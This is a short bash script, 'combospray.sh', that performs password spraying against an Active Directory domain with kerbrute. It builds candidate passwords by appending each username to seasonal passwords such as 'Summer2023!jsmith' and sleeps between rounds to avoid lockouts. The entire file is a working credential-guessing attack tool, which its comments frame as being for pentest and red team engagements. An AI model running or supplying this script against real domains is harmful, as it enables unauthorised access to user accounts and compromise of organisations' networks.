combospray.sh

#!/bin/bash

opts='d:s:u:p:'
while getopts $opts arg; do
  case $arg in
    d ) domain=$OPTARG;;
    s ) sleep_interval=$OPTARG;;
    u ) usernames=$OPTARG;;
    p ) passwords=$OPTARG;;
    * ) echo 'Invalid switch';;
  esac
done

#A simple password spraying script using kerbrute that allows for username integration into spraying attempts.
#For example, say you find that the enterprise system you're testing has a lot of passwords like:
#SeasonYear$username
#This script will automatically append the username to the password. 
#I.e. user jsmith:
#Summer2023!jsmith

echo '.........................................................'
echo 'Usage:'
echo './combospray.sh -d domain.local -s 20m -u usernames.txt -p passwords.txt'
echo ''
echo 'ComboSpray'
echo 'A simple script to leverage password policies that implement usernames during pentest/red team engagements'
echo '..........................................................'

# inits
passwords_file=$passwords
usernames_file=$usernames
# current username/password
echo "Using $usernames and $passwords"
domain=$domain

#double loop to while read user and pass
while read password; do
  while read username; do
    combo="$password$username"
    echo "Spraying password: $password for username: $username"
    
    # init temp file containing the current username -- had to do this way because kerbrute doesn't allow single usernames, only username files.. so this was the simplest workaround.
    temp_userfile=$(mktemp)
    echo "$username" > "$temp_userfile"
    
    kerbrute passwordspray -d "$domain" -vv --safe "$temp_userfile" "$combo"
    
    # rm the temporary file
    rm "$temp_userfile"
  done < "$usernames_file"
  sleep "$sleep_interval"  # Sleep for $sleep_interval minutes before the next spray attempt
  echo "Sleeping for $sleep_interval minutes"  
done < "$passwords_file"